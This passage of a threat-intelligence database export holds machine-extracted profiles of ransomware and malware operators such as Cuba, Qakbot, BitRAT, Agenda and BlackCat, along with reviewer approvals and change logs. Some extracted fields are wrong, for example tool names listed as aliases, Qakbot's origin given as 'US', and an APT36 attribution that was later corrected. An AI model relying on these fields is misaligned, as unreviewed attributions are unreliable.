  "raw_openAI_analysis": "{\"threat_actor\": [\"Cuba ransomware gang\", \"Cuba cybercrime gang\"], \"aliases\": [\"Tropical Scorpius\", \"ColdDraw\", \"Fidel\", \"Cuba\", \"V Is Vendetta\", \"Burntcigar\", \"Bughatch\", \"Cobalt Strike\"], \"country_of_origin\": [], \"target_countries\": [\"US\", \"CA\", \"EU\"], \"target_regions\": [\"americas\", \"europe\"], \"threat_actor_overview\": [\"The Cuba ransomware gang\", \" also known as Tropical Scorpius\", \" ColdDraw\", \" Fidel\", \" and V Is Vendetta\", \" is a ransomware-as-a-service (RaaS) outfit that primarily targets organizations in the United States\", \" Canada\", \" and Europe. The gang uses complex tactics and techniques to penetrate victim networks\", \" such as exploitation of software vulnerabilities and social engineering. They are known for their attacks on oil companies\", \" financial services\", \" government agencies\", \" and healthcare providers.\", \"The Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools\", \" which it keeps up to date\", \" and various techniques and methods including fairly dangerous ones\", \" such as BYOVD.\"], \"target_populations\": [], \"target_industry_sectors\": [\"oil\", \"financial-services\", \"government-public-services\", \"healthcare\", \"technology\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Enable Hypervisor-Protected Code Integrity\", \" Enable Memory Integrity\", \" Enable validation of driver digital signatures\", \" Use the vulnerable driver blocklist.\"], \"attack_consequences\": [\"Disruption of Service\", \" Damage and Destruction\"], \"vulnerabilities\": [\"CVE-2021-31207\", \"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-26855\", \"CVE-2021-26857\", \"CVE-2021-26858\", \"CVE-2021-27065\", \"CVE-2022-26501\", \"CVE-2022-26504\", \"CVE-2022-26500\", \"CVE-2020-1472\", \"CVE-2022-26522\", \"CVE-2022-26523\"], \"sources\": [\"Kaspersky Incident Response team\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T18:59:28.474Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "Cuba ransomware gang, Cuba cybercrime gang"
},
{
  "_id": {
    "$oid": "651b170894c99b091f3ed912"
  },
  "report": {
    "$oid": "651b16ad4870a8160e460e2a"
  },
  "threat_actor_overview": "Rorschach is a unique,  highly customizable,  and fast ransomware strain. It is partly autonomous,  carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment. It uses direct syscalls,  rarely observed in ransomware,  and is one of the fastest ransomware observed,  by the speed of encryption.",
  "aliases": [],
  "sources": [
    "Check Point Research (CPR)",
    "Check Point Incident Response Team (CPIRT)"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US"
  ],
  "target_regions": [
    "americas"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Rorschach\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Rorschach is a unique,  highly customizable,  and fast ransomware strain. It is partly autonomous,  carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment. It uses direct syscalls,  rarely observed in ransomware,  and is one of the fastest ransomware observed,  by the speed of encryption.\", \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [\"technology\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Check Point Research (CPR)\", \"Check Point Incident Response Team (CPIRT)\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Rorschach\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"threat_actor_overview\": [\"Rorschach is a unique\", \" highly customizable\", \" and fast ransomware strain. It is partly autonomous\", \" carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment. It uses direct syscalls\", \" rarely observed in ransomware\", \" and is one of the fastest ransomware observed\", \" by the speed of encryption.\"], \"target_populations\": [], \"target_industry_sectors\": [\"technology\"], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Check Point Research (CPR)\", \"Check Point Incident Response Team (CPIRT)\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "5WWyZVTNVXRMC7eb0YwTlemJDYE3",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:26:12.829Z"
  },
  "approval_message": "The scope of attack (America) is assumed, but it is likely to be in the scope so it is not technically wrong. Everything else is accurate. ",
  "change_log": [],
  "threat_actor": "Rorschach"
},
{
  "_id": {
    "$oid": "651b1bf894c99b091f3ed916"
  },
  "report": {
    "$oid": "651b1bdf4870a8160e460e30"
  },
  "threat_actor_overview": "Threat actors behind a recent malware campaign have been using the stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The company found that the infrastructure of an undisclosed Colombian cooperative bank had been hijacked by attackers while investigating BitRAT lures in active phishing attacks.",
  "aliases": [],
  "sources": [
    "Qualys"
  ],
  "country_of_origin": "CO",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "CO"
  ],
  "target_regions": [
    "americas",
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "A total of 418, 777 records containing sensitive customer data,  including names,  phone numbers,  email addresses,  addresses,  Colombian national IDs,  payment records,  and salary information,  were stolen from the breached servers.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"APT36\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"A total of 418, 777 records containing sensitive customer data,  including names,  phone numbers,  email addresses,  addresses,  Colombian national IDs,  payment records,  and salary information,  were stolen from the breached servers.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Threat actors behind a recent malware campaign have been using the stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The company found that the infrastructure of an undisclosed Colombian cooperative bank had been hijacked by attackers while investigating BitRAT lures in active phishing attacks.\", \"target_countries\": [], \"target_regions\": [\"americas\", \"asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Qualys\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"APT36\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [\"americas\", \"asia\"], \"threat_actor_overview\": [\"Threat actors behind a recent malware campaign have been using the stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The company found that the infrastructure of an undisclosed Colombian cooperative bank had been hijacked by attackers while investigating BitRAT lures in active phishing attacks.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [\"A total of 418\", \"777 records containing sensitive customer data\", \" including names\", \" phone numbers\", \" email addresses\", \" addresses\", \" Colombian national IDs\", \" payment records\", \" and salary information\", \" were stolen from the breached servers.\"], \"vulnerabilities\": [], \"sources\": [\"Qualys\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [
    {
      "_id": {
        "$oid": "652453d6dd4337e9edebd483"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-10-09T19:26:14.999Z"
      },
      "changes": [
        {
          "field": "target_countries",
          "previous_value": [],
          "updated_value": [
            "CO"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "652453b3dd4337e9edebd482"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-10-09T19:25:39.288Z"
      },
      "changes": [
        {
          "field": "country_of_origin",
          "previous_value": "",
          "updated_value": "CO"
        }
      ]
    },
    {
      "_id": {
        "$oid": "6524539ddd4337e9edebd481"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-10-09T19:25:17.169Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "APT36",
          "updated_value": "BitRAT"
        }
      ]
    }
  ],
  "threat_actor": "BitRAT"
},
{
  "_id": {
    "$oid": "651b1e0494c99b091f3ed919"
  },
  "report": {
    "$oid": "651b18374870a8160e460e2b"
  },
  "threat_actor_overview": "Qakbot is a botnet that has been disrupted by the US Department of Justice (DoJ) and US Federal Bureau of Investigation (FBI),  along with other global law enforcement partners. The botnet has been used to drop additional malware on infected systems and has been associated with other criminal activities such as unauthorized deployment of Cobalt Strike,  likely as a precursor to ransomware attacks.",
  "aliases": [],
  "sources": [
    "The Shadowserver Foundation"
  ],
  "country_of_origin": "US",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [
    "americas",
    "europe",
    "asia",
    "africa",
    "oceania"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "The FBI has deleted the Qakbot malware from infected victim computers under US court order. However,  other malware infections may still be active on these systems and require further local remediation efforts.",
  "attack_consequences": "The Qakbot botnet has infected over 700, 000 discrete systems in 230 countries from July 2019 to August 2023. These systems may have been used in historic or recent intrusions and ransomware incidents.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Qakbot\", \"country_of_origin\": \"US\", \"attack_mitigations\": \"The FBI has deleted the Qakbot malware from infected victim computers under US court order. However,  other malware infections may still be active on these systems and require further local remediation efforts.\", \"attack_consequences\": \"The Qakbot botnet has infected over 700, 000 discrete systems in 230 countries from July 2019 to August 2023. These systems may have been used in historic or recent intrusions and ransomware incidents.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Qakbot is a botnet that has been disrupted by the US Department of Justice (DoJ) and US Federal Bureau of Investigation (FBI),  along with other global law enforcement partners. The botnet has been used to drop additional malware on infected systems and has been associated with other criminal activities such as unauthorized deployment of Cobalt Strike,  likely as a precursor to ransomware attacks.\", \"target_countries\": [], \"target_regions\": [\"americas\", \"europe\", \"asia\", \"africa\", \"oceania\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"The Shadowserver Foundation\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Qakbot\"], \"aliases\": [], \"country_of_origin\": [\"US\"], \"target_countries\": [], \"target_regions\": [\"americas\", \"europe\", \"asia\", \"africa\", \"oceania\"], \"threat_actor_overview\": [\"Qakbot is a botnet that has been disrupted by the US Department of Justice (DoJ) and US Federal Bureau of Investigation (FBI)\", \" along with other global law enforcement partners. The botnet has been used to drop additional malware on infected systems and has been associated with other criminal activities such as unauthorized deployment of Cobalt Strike\", \" likely as a precursor to ransomware attacks.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"The FBI has deleted the Qakbot malware from infected victim computers under US court order. However\", \" other malware infections may still be active on these systems and require further local remediation efforts.\"], \"attack_consequences\": [\"The Qakbot botnet has infected over 700\", \"000 discrete systems in 230 countries from July 2019 to August 2023. These systems may have been used in historic or recent intrusions and ransomware incidents.\"], \"vulnerabilities\": [], \"sources\": [\"The Shadowserver Foundation\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "5WWyZVTNVXRMC7eb0YwTlemJDYE3",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:46:33.890Z"
  },
  "approval_message": "Everything short of countries (which were too broad/inaccurate) was accurate. I wouldn't consider it a crime syndicate but it is not an inaccurate description of the structure used.",
  "change_log": [],
  "threat_actor": "Qakbot"
},
{
  "_id": {
    "$oid": "6524532c41bf68f33591f369"
  },
  "report": {
    "$oid": "65244944fec8c00d802df9a4"
  },
  "threat_actor_overview": null,
  "aliases": [],
  "sources": [],
  "country_of_origin": null,
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": null,
  "attack_consequences": null,
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"\", \"target_countries\": [], \"target_regions\": [\"asia\", \"africa\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [\"healthcare\", \"education\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"team\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [\"asia\", \"africa\"], \"threat_actor_overview\": [], \"target_populations\": [], \"target_industry_sectors\": [\"healthcare\", \"education\"], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"team\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": []
},
{
  "_id": {
    "$oid": "65245b6245e55a5610c324bd"
  },
  "report": {
    "$oid": "652454b8dd4337e9edebd484"
  },
  "threat_actor_overview": "Agenda,  also known as Qilin,  is a ransomware-as-a-service group that has recently started using Rust,  a cross-platform language,  to tailor their ransomware to different operating systems. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim using confidential information such as leaked accounts and unique company IDs. They also use intermittent encryption for faster encryption and detection evasion.",
  "aliases": [
    "Qilin"
  ],
  "sources": [
    "Trend Micro Incorporated"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [
    "T1566.001",
    "T1486",
    "T1489",
    "T1490",
    "T1027",
    "T1021.002"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "TH",
    "ID"
  ],
  "target_regions": [
    "asia"
  ],
  "target_populations": [
    "C Manufacturing",
    "J Information and Communication",
    "Q Human health and social work activities",
    "P Education"
  ],
  "target_industry_sectors": [
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--1dd8ed24-7655-4f0d-80ef-35c36a5b0593"
  ],
  "attack_mitigations": "Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.",
  "attack_consequences": "Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agenda\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.\", \"attack_consequences\": \"Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agenda,  also known as Qilin,  is a ransomware-as-a-service group that has recently started using Rust,  a cross-platform language,  to tailor their ransomware to different operating systems. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim using confidential information such as leaked accounts and unique company IDs. They also use intermittent encryption for faster encryption and detection evasion.\", \"target_countries\": [\"TH\", \"ID\"], \"target_regions\": [\"asia\"], \"target_populations\": [\"C Manufacturing\", \"J Information and Communication\", \"Q Human health and social work activities\", \"P Education\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Financial Theft\"], \"target_industry_sectors\": [\"healthcare\", \"education\", \"manufacturing\", \"technology\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1486\", \"T1489\", \"T1490\", \"T1027\", \"T1021.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"Qilin\"], \"vulnerabilities\": [], \"sources\": [\"Trend Micro Incorporated\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agenda\"], \"aliases\": [\"Qilin\"], \"country_of_origin\": [], \"target_countries\": [\"TH\", \"ID\"], \"target_regions\": [\"asia\"], \"threat_actor_overview\": [\"Agenda\", \" also known as Qilin\", \" is a ransomware-as-a-service group that has recently started using Rust\", \" a cross-platform language\", \" to tailor their ransomware to different operating systems. They have been known to target vital industries and have recently been seen targeting the healthcare and education sectors. They customize their ransomware for each victim using confidential information such as leaked accounts and unique company IDs. They also use intermittent encryption for faster encryption and detection evasion.\"], \"target_populations\": [\"C Manufacturing\", \"J Information and Communication\", \"Q Human health and social work activities\", \"P Education\"], \"target_industry_sectors\": [\"healthcare\", \"education\", \"manufacturing\", \"technology\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Financial Theft\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1486\", \"T1489\", \"T1490\", \"T1027\", \"T1021.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"crime-syndicate\"], \"attack_mitigations\": [\"Enterprises and organizations should rely on a multilayered solution to secure data, including visibility, correlated detection, and behavior monitoring across multiple layers: email, endpoints, servers, cloud workloads.\"], \"attack_consequences\": [\"Victims may experience disruption of services, financial loss due to ransom payment, potential data leakage, and damage to their reputation.\"], \"vulnerabilities\": [], \"sources\": [\"Trend Micro Incorporated\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [],
  "threat_actor": "Agenda"
},
{
  "_id": {
    "$oid": "65245ba645e55a5610c324be"
  },
  "report": {
    "$oid": "65245516dd4337e9edebd485"
  },
  "threat_actor_overview": "The threat group referring to itself as “MONTI” is little-known within the threat intelligence community. The limited evidence we discovered regarding this threat actor indicates they emerged between May and June 2022. Based on analysis conducted in this investigation,  BlackBerry researchers believe that the Monti group has purposefully (and brazenly) mimicked the better-known 'Conti' team's tactics,  techniques,  and procedures (TTPs),  along with many of its tools and its ransomware encryptor payload., Monti is a threat actor that has been found to reuse Conti's encryptor code. The ransomware payload associated with this actor is a 32-bit Windows executable named 'locker.exe'. Upon execution,  the malware encrypts files on disk and adds a '.PUUUK' extension to affected files' names. The ransom note produced is almost identical to the notes produced by some Conti ransomware variants,  except it references a 'MONTI strain' instead of a 'CONTI strain'.",
  "aliases": [
    "Monti Ransomware Group",
    "MONTI strain",
    "Conti"
  ],
  "sources": [
    "BlackBerry Blog",
    "2023 cybersecurity threat report",
    "Researchers Luigi Martire, Carmelo Ragusa, and Luca Mella from the cybersecurity company Yoroi",
    "BlackBerry IR team"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1078.003",
    "T1566.001",
    "T1021.001",
    "T1003.001",
    "T1046",
    "T1077",
    "T1560",
    "T1567.002"
  ],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6"
  ],
  "attack_mitigations": "Regularly update and patch systems, Implement strong password policies, Use multi-factor authentication, Regularly backup and encrypt data, Educate employees about phishing attacks, Backing up encrypted files for potential future decryption",
  "attack_consequences": "Disruption of service, Data theft, Financial loss, Disruption of service due to file encryption",
  "vulnerabilities": [
    "CVE-2021-44228"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"MONTI, Monti\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Regularly update and patch systems, Implement strong password policies, Use multi-factor authentication, Regularly backup and encrypt data, Educate employees about phishing attacks, Backing up encrypted files for potential future decryption\", \"attack_consequences\": \"Disruption of service, Data theft, Financial loss, Disruption of service due to file encryption\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The threat group referring to itself as \\u201cMONTI\\u201d is little-known within the threat intelligence community. The limited evidence we discovered regarding this threat actor indicates they emerged between May and June 2022. Based on analysis conducted in this investigation,  BlackBerry researchers believe that the Monti group has purposefully (and brazenly) mimicked the better-known 'Conti' team's tactics,  techniques,  and procedures (TTPs),  along with many of its tools and its ransomware encryptor payload., Monti is a threat actor that has been found to reuse Conti's encryptor code. The ransomware payload associated with this actor is a 32-bit Windows executable named 'locker.exe'. Upon execution,  the malware encrypts files on disk and adds a '.PUUUK' extension to affected files' names. The ransom note produced is almost identical to the notes produced by some Conti ransomware variants,  except it references a 'MONTI strain' instead of a 'CONTI strain'.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"technology\"], \"threat_actor_capabilities\": [\"T1078.003\", \"T1566.001\", \"T1021.001\", \"T1003.001\", \"T1046\", \"T1077\", \"T1560\", \"T1567.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"unknown\"], \"aliases\": [\"Monti Ransomware Group\", \"MONTI strain\", \"Conti\"], \"vulnerabilities\": [\"CVE-2021-44228\"], \"sources\": [\"BlackBerry Blog\", \"2023 cybersecurity threat report\", \"Researchers Luigi Martire, Carmelo Ragusa, and Luca Mella from the cybersecurity company Yoroi\", \"BlackBerry IR team\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"MONTI\", \"Monti\"], \"aliases\": [\"Monti Ransomware Group\", \"MONTI strain\", \"Conti\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"The threat group referring to itself as \\u201cMONTI\\u201d is little-known within the threat intelligence community. The limited evidence we discovered regarding this threat actor indicates they emerged between May and June 2022. Based on analysis conducted in this investigation\", \" BlackBerry researchers believe that the Monti group has purposefully (and brazenly) mimicked the better-known 'Conti' team's tactics\", \" techniques\", \" and procedures (TTPs)\", \" along with many of its tools and its ransomware encryptor payload.\", \"Monti is a threat actor that has been found to reuse Conti's encryptor code. The ransomware payload associated with this actor is a 32-bit Windows executable named 'locker.exe'. Upon execution\", \" the malware encrypts files on disk and adds a '.PUUUK' extension to affected files' names. The ransom note produced is almost identical to the notes produced by some Conti ransomware variants\", \" except it references a 'MONTI strain' instead of a 'CONTI strain'.\"], \"target_populations\": [], \"target_industry_sectors\": [\"technology\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1078.003\", \"T1566.001\", \"T1021.001\", \"T1003.001\", \"T1046\", \"T1077\", \"T1560\", \"T1567.002\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"unknown\", \"individual\"], \"threat_actor_sophistication\": [\"intermediate\", \"advanced\"], \"threat_actor_type\": [\"unknown\"], \"attack_mitigations\": [\"Regularly update and patch systems\", \"Implement strong password policies\", \"Use multi-factor authentication\", \"Regularly backup and encrypt data\", \"Educate employees about phishing attacks\", \"Backing up encrypted files for potential future decryption\"], \"attack_consequences\": [\"Disruption of service\", \"Data theft\", \"Financial loss\", \"Disruption of service due to file encryption\"], \"vulnerabilities\": [\"CVE-2021-44228\"], \"sources\": [\"BlackBerry Blog\", \"2023 cybersecurity threat report\", \"Researchers Luigi Martire, Carmelo Ragusa, and Luca Mella from the cybersecurity company Yoroi\", \"BlackBerry IR team\"]}",
  "approval_status": "PENDING APPROVAL",
  "approval_status_changed_by": null,
  "approval_status_changed_on": null,
  "approval_message": null,
  "change_log": [],
  "threat_actor": "MONTI, Monti"
},
{
  "_id": {
    "$oid": "65245e0145e55a5610c324bf"
  },
  "report": {
    "$oid": "65245dbedd4337e9edebd487"
  },
  "threat_actor_overview": "BlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations worldwide over the past few months. It is not a rebranding of BlackMatter,  but its team is made from affiliates of other RaaS groups (including BlackMatter).",
  "aliases": [
    "ALPHV"
  ],
  "sources": [
    "Cisco Talos Intelligence Blog"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1078.003",
    "T1021.006",
    "T1021.001",
    "T1021.002",
    "T1021.004",
    "T1021.005",
    "T1078.001",
    "T1078.002",
    "T1078.004",
    "T1078.005"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US"
  ],
  "target_regions": [
    "americas"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Understanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent attacks before the ransomware itself is executed.",
  "attack_consequences": "Victims of a successful attack are likely to experience data loss due to file encryption and potential public disclosure of stolen files.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BlackCat\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Understanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent attacks before the ransomware itself is executed.\", \"attack_consequences\": \"Victims of a successful attack are likely to experience data loss due to file encryption and potential public disclosure of stolen files.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"BlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations worldwide over the past few months. It is not a rebranding of BlackMatter,  but its team is made from affiliates of other RaaS groups (including BlackMatter).\", \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1078.003\", \"T1021.006\", \"T1021.001\", \"T1021.002\", \"T1021.004\", \"T1021.005\", \"T1078.001\", \"T1078.002\", \"T1078.004\", \"T1078.005\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"crime-syndicate\"], \"aliases\": [\"ALPHV\"], \"vulnerabilities\": [], \"sources\": [\"Cisco Talos Intelligence Blog\"]}",
